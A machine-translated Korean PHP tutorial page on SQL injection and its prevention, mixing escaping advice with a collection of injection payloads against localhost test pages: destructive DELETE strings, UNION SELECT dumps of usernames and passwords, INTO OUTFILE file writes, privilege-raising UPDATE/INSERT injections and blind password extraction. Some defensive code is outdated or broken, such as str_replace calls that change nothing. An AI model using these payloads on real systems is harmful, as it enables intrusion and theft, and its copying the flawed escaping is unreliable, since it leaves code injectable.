백엔드 개발 PHP 튜토리얼 PHP SQL 주입 공격 및 예방 조치

PHP SQL 주입 공격 및 예방 조치

Jul 25, 2016 am 08:52 AM

  1. // 가정된 입력
  2. $name = "ilia'; DELETE FROM users;"
  3. mysql_query("SELECT * FROM users WHERE name='{ $name}'");
코드 복사

분명히 데이터베이스에서 실행되는 마지막 명령은 다음과 같습니다.

  1. SELECT * FROM users WHERE name=ilia; DELETE FROM users
코드 복사

이는 데이터베이스에 재앙적인 결과를 가져왔습니다. 모든 기록이 삭제되었습니다.

하지만 사용 중인 데이터베이스가 MySQL이라면 다행히 mysql_query() 함수를 사용하면 이러한 작업을 직접 수행할 수 없으므로(한 줄에 여러 문 작업을 수행할 수 없음) 안심하셔도 됩니다. 사용된 데이터베이스가 SQLite 또는 PostgreSQL이고 그러한 명령문을 지원하는 경우 재난에 직면하게 됩니다.

위에서 언급했듯이 SQL 인젝션은 주로 공격 목적을 달성하기 위해 안전하지 않은 데이터를 데이터베이스에 제출합니다. SQL 주입 공격을 방지하기 위해 PHP에는 입력 문자열을 처리하고 하위 수준에서 입력에 대해 사전 보안 처리를 수행할 수 있는 기능, 즉 Magic Quotes가 제공됩니다. (php.ini Magic_quotes_gpc). Magic_quotes_gpc 옵션이 활성화되면 입력 문자열의 작은따옴표, 큰따옴표 및 기타 문자 앞에 자동으로 백슬래시가 붙습니다.

그러나 Magic Quotes는 매우 보편적인 솔루션이 아니며 잠재적으로 위험한 모든 캐릭터를 차단하지 않으며 Magic Quotes가 많은 서버에서 활성화되지 않습니다. 따라서 SQL 인젝션을 방지하기 위해서는 다른 다양한 방법도 활용해야 합니다.

많은 데이터베이스가 기본적으로 이러한 입력 데이터 처리 기능을 제공합니다. 예를 들어, PHP의 MySQL 연산 함수에는 mysql_real_escape_string()이라는 함수가 있는데, 이는 특수 문자나 데이터베이스 연산 오류를 일으킬 수 있는 문자를 이스케이프할 수 있습니다. 이 코드는:

  1. //Magic Quotes 기능이 활성화된 경우

  2. if (get_magic_quotes_gpc()) {
  3. $name = Stripslashes ( $name);
  4. }else{
  5. $name = mysql_real_escape_string($name)
  6. }

  7. mysql_query("SELECT * FROM users WHERE name=' { $name}'");

코드 복사

에서 제공하는 기능을 사용하기 전에 Magic Quotes를 판단해야 합니다. 데이터베이스를 오픈할지 여부는 위의 예와 같이, 그렇지 않으면 프로세스가 두 번 반복되면 오류가 발생합니다. MQ가 활성화된 경우 실제 데이터를 얻으려면 추가된 항목을 제거해야 합니다.

위의 문자열 형식 데이터를 전처리하는 것 외에도 Binary 데이터를 데이터베이스에 저장할 때 전처리에도 주의해야 합니다. 그렇지 않으면 데이터가 데이터베이스 자체의 저장 형식과 충돌하여 데이터베이스가 충돌하거나 데이터 레코드가 손실되거나 전체 데이터베이스가 손실될 수도 있습니다. PostgreSQL과 같은 일부 데이터베이스는 Base64와 유사한 데이터를 인코딩할 수 있는 바이너리 데이터를 인코딩하는 데 특별히 사용되는 pg_escape_bytea() 함수를 제공합니다.

예:

  1. // 일반 텍스트 데이터 사용의 경우:

  2. pg_escape_string($regular_strings);

  3. // 바이너리 데이터 사용:

  4. pg_escape_bytea($binary_data);

코드 복사

다른 경우에도 이러한 메커니즘을 사용해야 합니다. 즉, 데이터베이스 시스템 자체에서 지원하지 않는 중국어, 일본어 등의 멀티바이트 언어입니다. 그 중 일부에는 이진 데이터 범위와 겹치는 ASCII 범위가 있습니다.

여기서는 PHP SQL 주입 방지에 관한 두 가지 기사를 추천합니다. 하나는 360 Security에서 제공하는 것이고, 다른 하나는 저자가 수집한 PHP SQL 주입 방지 코드입니다. 매우 강력하고 사용하기 쉽습니다.
  • php 안티 SQL 인젝션 코드(360에서 제공)
  • SQL 인젝션 취약점 필터링 기능을 방지하는 PHP 코드

그러나 데이터를 인코딩하면 LIKE abc%와 같은 쿼리 문이 실패할 수 있습니다.

php sql 주입 구현(테스트 코드는 안전합니다)

SQL 주입의 초점은 SQL을 유연하게 사용하여 SQL 문을 구성하는 것입니다. 새로운 주입 문자열을 구성하는 명령문입니다. 공부한 후에는 몇 가지 메모를 작성하여 언제든지 사용할 수 있도록 준비했습니다. 다음 내용을 먼저 읽어보시길 바랍니다 SQL의 기본 원리를 이해합니다. 메모의 코드는 인터넷에서 가져온 것입니다. ===기본부분=== 이 테이블을 쿼리합니다. http://127.0.0.1/injection/user.php?username=angel' 및 LENGTH(비밀번호)='6 http://127.0.0.1/injection/user.php?username=angel' 및 LEFT(password,1)='m

노조 성명: http://127.0.0.1/injection/show.php?id=1' 사용자/*에서 1, 사용자 이름, 비밀번호를 선택하세요. http://127.0.0.1/injection/show.php?id=' 유니온 선택 1,사용자 이름,사용자의 비밀번호/*

파일 내보내기: http://127.0.0.1/injection/user.php?username=angel'을 outfile 'c:/file.txt로 http://127.0.0.1/injection/user.php?username=' 또는 1=1 outfile 'c:/file.txt http://127.0.0.1/injection/show.php?id=' 유니온 선택 1, 사용자 이름, 사용자의 비밀번호를 outfile 'c:/user.txt

INSERT 문: INSERT INTO `user` (사용자 ID, 사용자 이름, 비밀번호, 홈페이지, 사용자 수준) VALUES ('', '$username', '$password', '$homepage', '1'); 홈페이지 값 구성 : http://jbxue.com', '3')# SQL 문은 다음과 같습니다: INSERT INTO `user` (userid, 사용자 이름, 비밀번호, 홈페이지, userlevel) VALUES ('', 'angel', 'mypass', 'http://jbxue.com', '3')#' , '1');

UPDATE 설명: 이 점이 마음에 듭니다. 먼저 이 SQL을 이해하세요.

  1. 사용자 설정 비밀번호 업데이트='MD5($password)', 홈페이지='$homepage' WHERE id='$id'
코드 복사

이 SQL을 다음과 같은 형태로 수정하면 인젝션이 이루어진다. 1: 홈페이지 값을 다음으로 수정합니다. http://jbxue.com', userlevel='3 그러면 SQL 문은 다음과 같습니다.

  1. 사용자 설정 업데이트 비밀번호='mypass', 홈페이지='http://jbxue.com', userlevel='3' WHERE id='$id '
코드 복사

userlevel은 사용자 수준입니다. 2: 비밀번호 값을 다음으로 수정합니다.

  1. mypass)' WHERE 사용자 이름='admin'#
코드 복사

SQL 이후 진술은

  1. 사용자 설정 비밀번호 업데이트='MD5(mypass)' WHERE 사용자 이름='admin'#)', 홈페이지='$homepage' WHERE id='$ id'
코드 복사

3: id 값을 다음으로 수정합니다. ' 또는 사용자 이름='admin' 그러면 SQL 문은 다음과 같습니다.

  1. 사용자 설정 비밀번호 업데이트='MD5($password)', 홈페이지='$homepage' WHERE id='' OR 사용자 이름='admin'
코드 복사

===고급 섹션=== 일반적으로 사용되는 MySQL 내장 함수 데이터 베이스() 사용자() 시스템_사용자() 세션_사용자() CURRENT_USER() 데이터 베이스() 버전() 하위 문자열() 중간() 숯() 로드_파일() … 기능적용 업데이트 기사 SET title=DATABASE() WHERE id=1 http://127.0.0.1/injection/show.php?id=-1 통합 선택 1,데이터베이스(),버전()

    SELECT * From User Where Username = Char(97, 1110, 103, 101,108)
  1. # Char(97,110,103,101,108)는 Bleak >
  2. 과 동일합니다. 코드 복사
  3. http://127.0.0.1/injection/user.php?userid=1 및 비밀번호=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 및 LEFT(비밀번호 ,1)>문자(100) http://127.0.0.1/injection/user.php?userid=1 및 ord(mid(password,3,1))>111

    데이터 구조의 필드 수와 유형 결정 http://127.0.0.1/injection/show.php?id=-1 유니온 선택 1,1,1 http://127.0.0.1/injection/show.php?id=-1 통합 선택 char(97),char(97),char(97)

    데이터 테이블 이름 추측하기 http://127.0.0.1/injection/show.php?id=-1 조합원 중에서 1,1,1 선택

    사용자 이름과 비밀번호를 얻기 위한 교차 테이블 쿼리 http://127.0.0.1/ymdown/show.php?id=10000 통합 선택 1,사용자 이름,1,비밀번호,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user 여기서 ID=1

    기타 #첫 번째 비밀번호를 확인하세요 http://127.0.0.1/ymdown/show.php?id=10 통합 선택 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1 from ymdown_user 여기서 id=1 및 ord(mid(password,1,1))=49

    ===주사방지=== 서버측면 Magic_quotes_gpc가 켜짐으로 설정되었습니다. display_errors가 꺼짐으로 설정되었습니다. 코딩 측면

    1. $keywords = addlashes($keywords);
    2. $keywords = str_replace("_","_",$keywords)
    3. $keywords = str_replace("%","%",$keywords)
    코드 복사

    숫자 유형 intval()을 사용하여 잡아서 바꾸기 문자열 유형 SQL 문 매개변수에 작은따옴표 추가 주입을 방지하기 위해 다음 코드가 사용됩니다.

    1. if (get_magic_quotes_gpc()) {
    2. //....
    3. }else{
    4. $str = mysql_real_escape_string($str );
    5. $keywords = str_replace("_","_",$keywords)
    6. $keywords = str_replace("%","%",$keywords)
    7. }
    코드 복사
    유용한 기능 스트립슬래시() get_magic_quotes_gpc() mysql_real_escape_string() 스트립_태그() 배열_맵() 속눈썹 추가()


본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.

핫 AI 도구

Undresser.AI Undress

Undresser.AI Undress

사실적인 누드 사진을 만들기 위한 AI 기반 앱

AI Clothes Remover

AI Clothes Remover

사진에서 옷을 제거하는 온라인 AI 도구입니다.

Undress AI Tool

Undress AI Tool

무료로 이미지를 벗다

Clothoff.io

Clothoff.io

AI 옷 제거제

Video Face Swap

Video Face Swap

완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!

뜨거운 도구

메모장++7.3.1

메모장++7.3.1

사용하기 쉬운 무료 코드 편집기

SublimeText3 중국어 버전

SublimeText3 중국어 버전

중국어 버전, 사용하기 매우 쉽습니다.

스튜디오 13.0.1 보내기

스튜디오 13.0.1 보내기

강력한 PHP 통합 개발 환경

드림위버 CS6

드림위버 CS6

시각적 웹 개발 도구

SublimeText3 Mac 버전

SublimeText3 Mac 버전

신 수준의 코드 편집 소프트웨어(SublimeText3)

세션 납치는 어떻게 작동하며 PHP에서 어떻게 완화 할 수 있습니까? 세션 납치는 어떻게 작동하며 PHP에서 어떻게 완화 할 수 있습니까? Apr 06, 2025 am 12:02 AM

세션 납치는 다음 단계를 통해 달성 할 수 있습니다. 1. 세션 ID를 얻으십시오. 2. 세션 ID 사용, 3. 세션을 활성 상태로 유지하십시오. PHP에서 세션 납치를 방지하는 방법에는 다음이 포함됩니다. 1. 세션 _regenerate_id () 함수를 사용하여 세션 ID를 재생산합니다. 2. 데이터베이스를 통해 세션 데이터를 저장하십시오.

PHP의 다른 오류 유형을 설명하십시오 (통지, 경고, 치명적인 오류, 구문 분석 오류). PHP의 다른 오류 유형을 설명하십시오 (통지, 경고, 치명적인 오류, 구문 분석 오류). Apr 08, 2025 am 12:03 AM

PHP에는 4 가지 주요 오류 유형이 있습니다. 1. NOTICE : 가장 작은 것은 정의되지 않은 변수에 액세스하는 것과 같이 프로그램을 방해하지 않습니다. 2. 경고 : 심각한 통지는 파일을 포함하지 않는 것과 같은 프로그램을 종료하지 않습니다. 3. FatalError : 가장 심각한 것은 기능을 부르는 것과 같은 프로그램을 종료합니다. 4. parseerror : 구문 오류는 엔드 태그를 추가하는 것을 잊어 버리는 것과 같이 프로그램이 실행되는 것을 방지합니다.

PHP 및 Python : 두 가지 인기있는 프로그래밍 언어를 비교합니다 PHP 및 Python : 두 가지 인기있는 프로그래밍 언어를 비교합니다 Apr 14, 2025 am 12:13 AM

PHP와 Python은 각각 고유 한 장점이 있으며 프로젝트 요구 사항에 따라 선택합니다. 1.PHP는 웹 개발, 특히 웹 사이트의 빠른 개발 및 유지 보수에 적합합니다. 2. Python은 간결한 구문을 가진 데이터 과학, 기계 학습 및 인공 지능에 적합하며 초보자에게 적합합니다.

HTTP 요청 방법 (Get, Post, Put, Delete 등)이란 무엇이며 언제 각각을 사용해야합니까? HTTP 요청 방법 (Get, Post, Put, Delete 등)이란 무엇이며 언제 각각을 사용해야합니까? Apr 09, 2025 am 12:09 AM

HTTP 요청 방법에는 각각 리소스를 확보, 제출, 업데이트 및 삭제하는 데 사용되는 Get, Post, Put and Delete가 포함됩니다. 1. GET 방법은 리소스를 얻는 데 사용되며 읽기 작업에 적합합니다. 2. 게시물은 데이터를 제출하는 데 사용되며 종종 새로운 리소스를 만드는 데 사용됩니다. 3. PUT 방법은 리소스를 업데이트하는 데 사용되며 완전한 업데이트에 적합합니다. 4. 삭제 방법은 자원을 삭제하는 데 사용되며 삭제 작업에 적합합니다.

PHP에서 보안 비밀번호 해싱을 설명하십시오 (예 : Password_hash, Password_Verify). 왜 MD5 또는 SHA1을 사용하지 않습니까? PHP에서 보안 비밀번호 해싱을 설명하십시오 (예 : Password_hash, Password_Verify). 왜 MD5 또는 SHA1을 사용하지 않습니까? Apr 17, 2025 am 12:06 AM

PHP에서 Password_hash 및 Password_Verify 기능을 사용하여 보안 비밀번호 해싱을 구현해야하며 MD5 또는 SHA1을 사용해서는 안됩니다. 1) Password_hash는 보안을 향상시키기 위해 소금 값이 포함 된 해시를 생성합니다. 2) Password_verify 암호를 확인하고 해시 값을 비교하여 보안을 보장합니다. 3) MD5 및 SHA1은 취약하고 소금 값이 부족하며 현대 암호 보안에는 적합하지 않습니다.

PHP 실행 : 실제 예제 및 응용 프로그램 PHP 실행 : 실제 예제 및 응용 프로그램 Apr 14, 2025 am 12:19 AM

PHP는 전자 상거래, 컨텐츠 관리 시스템 및 API 개발에 널리 사용됩니다. 1) 전자 상거래 : 쇼핑 카트 기능 및 지불 처리에 사용됩니다. 2) 컨텐츠 관리 시스템 : 동적 컨텐츠 생성 및 사용자 관리에 사용됩니다. 3) API 개발 : 편안한 API 개발 및 API 보안에 사용됩니다. 성능 최적화 및 모범 사례를 통해 PHP 애플리케이션의 효율성과 유지 보수 성이 향상됩니다.

PHP 7.4에 도입 된 화살표 기능 (짧은 폐쇄)을 설명하십시오. PHP 7.4에 도입 된 화살표 기능 (짧은 폐쇄)을 설명하십시오. Apr 06, 2025 am 12:01 AM

화살표 기능은 PHP7.4에 도입되었으며 단순화 된 형태의 짧은 폐쇄입니다. 1) => 연산자를 사용하여 정의되어 기능을 생략하고 키워드를 사용합니다. 2) 화살표 기능은 사용 키워드없이 현재 스코프 변수를 자동으로 캡처합니다. 3) 종종 코드 단순성과 가독성을 향상시키기 위해 콜백 기능 및 짧은 계산에 사용됩니다.

PHP : 웹 개발의 핵심 언어 PHP : 웹 개발의 핵심 언어 Apr 13, 2025 am 12:08 AM

PHP는 서버 측에서 널리 사용되는 스크립팅 언어이며 특히 웹 개발에 적합합니다. 1.PHP는 HTML을 포함하고 HTTP 요청 및 응답을 처리 할 수 ​​있으며 다양한 데이터베이스를 지원할 수 있습니다. 2.PHP는 강력한 커뮤니티 지원 및 오픈 소스 리소스를 통해 동적 웹 컨텐츠, 프로세스 양식 데이터, 액세스 데이터베이스 등을 생성하는 데 사용됩니다. 3. PHP는 해석 된 언어이며, 실행 프로세스에는 어휘 분석, 문법 분석, 편집 및 실행이 포함됩니다. 4. PHP는 사용자 등록 시스템과 같은 고급 응용 프로그램을 위해 MySQL과 결합 할 수 있습니다. 5. PHP를 디버깅 할 때 error_reporting () 및 var_dump ()와 같은 함수를 사용할 수 있습니다. 6. 캐싱 메커니즘을 사용하여 PHP 코드를 최적화하고 데이터베이스 쿼리를 최적화하며 내장 기능을 사용하십시오. 7

See all articles